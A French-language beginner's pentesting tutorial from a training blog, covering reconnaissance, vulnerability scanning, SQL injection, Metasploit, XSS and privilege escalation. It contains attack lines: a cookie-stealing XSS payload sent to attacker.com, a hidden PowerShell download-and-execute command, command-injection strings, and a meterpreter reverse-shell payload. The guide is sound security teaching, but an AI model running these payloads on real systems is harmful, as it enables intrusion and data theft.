0%
Guide Complet du Pentesting : De Débutant à Expert

Guide Complet du Pentesting : De Débutant à Expert

Guide exhaustif du test de pénétration pour débutants. Apprenez étape par étape les techniques, outils et méthodologies essentielles du pentesting, avec des exemples pratiques et des exercices.

I

InSkillCoach

· min

Guide Complet du Pentesting : De Débutant à Expert

Introduction au Pentesting

Le pentesting (test de pénétration) est une pratique essentielle en cybersécurité qui consiste à évaluer la sécurité d’un système informatique en simulant des attaques contrôlées. Ce guide vous accompagnera pas à pas dans l’apprentissage du pentesting.

Prérequis et Installation

1. Configuration de l’Environnement

Installation de Kali Linux

# Téléchargement de Kali Linux
# 1. Visitez https://www.kali.org/downloads/
# 2. Téléchargez l'ISO

# Installation sur VirtualBox
1. Créez une nouvelle VM
2. Allouez au moins 2GB de RAM
3. 20GB d'espace disque
4. Montez l'ISO et installez

Configuration Initiale

# Mise à jour du système
sudo apt update
sudo apt upgrade -y

# Installation des outils essentiels
sudo apt install -y \
    nmap \
    wireshark \
    metasploit-framework \
    burpsuite \
    dirb \
    nikto

2. Premiers Pas avec Linux

Commandes Essentielles

# Navigation
ls          # Liste les fichiers
cd          # Change de répertoire
pwd         # Affiche le répertoire actuel

# Manipulation de fichiers
cat         # Affiche le contenu
nano        # Éditeur de texte
chmod       # Change les permissions

Phase 1 : Reconnaissance

1. Reconnaissance Passive

OSINT (Open Source Intelligence)

# Utilisation de whois
whois example.com

# DNS Lookup
dig example.com
nslookup example.com

# Google Dorks
site:example.com
filetype:pdf site:example.com
inurl:admin site:example.com

Outils de Reconnaissance

# Maltego
maltego &

# theHarvester
theHarvester -d example.com -b all

# Recon-ng
recon-ng

2. Reconnaissance Active

Scan de Ports avec Nmap

# Scan basique
nmap -sV target_ip

# Scan furtif
nmap -sS target_ip

# Scan complet avec scripts
nmap -sC -sV -p- target_ip -oN scan_results.txt

# Scan UDP
nmap -sU target_ip

Énumération des Services

# Énumération SMB
enum4linux target_ip

# Énumération Web
dirb http://target_ip
nikto -h http://target_ip

Phase 2 : Analyse des Vulnérabilités

1. Scan de Vulnérabilités

Utilisation de Nessus

  1. Installation de Nessus
# Téléchargement et installation
curl -O https://www.tenable.com/downloads/nessus
dpkg -i Nessus-*.deb
service nessusd start
  1. Configuration initiale

OpenVAS

# Installation
apt install openvas
gvm-setup
gvm-start

2. Analyse Web

Utilisation de Burp Suite

  1. Configuration du proxy
Proxy -> Options
- Interface: 127.0.0.1
- Port: 8080
  1. Configuration du navigateur
Firefox -> Préférences -> Réseau
- Paramètres proxy manuels
- SOCKS Host: 127.0.0.1
- Port: 8080

Tests d’Injection SQL

-- Test basique
' OR '1'='1

-- Test d'authentification
admin' --
admin' OR '1'='1'--

-- Test d'erreur
' UNION SELECT NULL--

Phase 3 : Exploitation

1. Metasploit Framework

Configuration Initiale

# Démarrage de Metasploit
msfconsole

# Mise à jour de la base de données
msfdb init
db_status

Utilisation Basique

# Recherche d'exploits
search ms17-010

# Configuration d'un exploit
use exploit/windows/smb/ms17_010_eternalblue
show options
set RHOSTS target_ip
exploit

2. Exploitation Web

XSS (Cross-Site Scripting)

// Test basique
<script>alert('XSS')</script>

// Vol de cookies
<script>fetch('http://attacker.com/steal?cookie='+document.cookie)</script>

// Test de DOM XSS
javascript:alert(document.domain)

Injection de Commandes

# Tests basiques
; ls
| cat /etc/passwd
`id`
$(whoami)

Phase 4 : Post-Exploitation

1. Élévation de Privilèges

Linux Privilege Escalation

# Énumération de base
id
uname -a
cat /etc/passwd
sudo -l

# Recherche de SUID
find / -perm -u=s -type f 2>/dev/null

# Kernel Exploits
searchsploit kernel version

Windows Privilege Escalation

# Énumération Windows
systeminfo
net user
whoami /priv

# PowerShell Empire
powershell.exe -NoP -NonI -W Hidden -Exec Bypass IEX (New-Object Net.WebClient).DownloadString('http://attacker/script.ps1')

2. Maintien d’Accès

Création de Backdoors

# Msfvenom Payload
msfvenom -p windows/meterpreter/reverse_tcp \
         LHOST=attacker_ip \
         LPORT=4444 \
         -f exe \
         -o payload.exe

# Listener Metasploit
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST attacker_ip
set LPORT 4444
exploit

Phase 5 : Documentation et Reporting

1. Documentation des Tests

Structure du Rapport

1. Résumé Exécutif
2. Méthodologie
3. Résultats Détaillés
   - Vulnérabilités trouvées
   - Preuves de concept
   - Impact potentiel
4. Recommandations
5. Annexes techniques

2. Outils de Reporting

# Script de génération de rapport
def generate_report():
    """
    Structure de base pour un rapport
    """
    report = {
        'executive_summary': [],
        'findings': [],
        'recommendations': [],
        'technical_details': []
    }
    return report

Exercices Pratiques

1. Laboratoire Virtuel

  • Installation de machines vulnérables
    • Metasploitable
    • DVWA
    • WebGoat

2. Challenges Progressifs

  1. Reconnaissance basique
  2. Scan de ports
  3. Identification de services
  4. Exploitation simple
  5. Post-exploitation

Bonnes Pratiques et Éthique

1. Cadre Légal

  • Obtention d’autorisations écrites
  • Respect du périmètre défini
  • Documentation des actions

2. Sécurité

- Isolation du laboratoire de test
- Chiffrement des données sensibles
- Nettoyage post-test

Ressources d’Apprentissage

1. Plateformes d’Entraînement

  • HackTheBox
  • TryHackMe
  • VulnHub
  • PortSwigger Web Security Academy

2. Certifications Recommandées

  • CompTIA Security+
  • CEH (Certified Ethical Hacker)
  • OSCP (Offensive Security Certified Professional)
  • PNPT (Practical Network Penetration Tester)

Conclusion

Le pentesting est un domaine vaste qui nécessite une pratique constante. Points clés à retenir :

  • Commencez par les bases
  • Pratiquez dans un environnement contrôlé
  • Documentez tout
  • Restez éthique et légal
  • Continuez à apprendre

Note de Sécurité : Ce guide est destiné à des fins éducatives uniquement. Toutes les techniques doivent être pratiquées dans un environnement de laboratoire contrôlé et avec les autorisations appropriées.

InSkillCoach

À propos de InSkillCoach

Expert en formation et technologies

Coach spécialisé dans les technologies avancées et l'IA, porté par GNeurone Inc.

Certifications:

  • AWS Certified Solutions Architect – Professional
  • Certifications Google Cloud
  • Microsoft Certified: DevOps Engineer Expert
  • Certified Kubernetes Administrator (CKA)
  • CompTIA Security+
824
223

Commentaires

Les commentaires sont alimentés par GitHub Discussions

Connectez-vous avec GitHub pour participer à la discussion

Lien copié !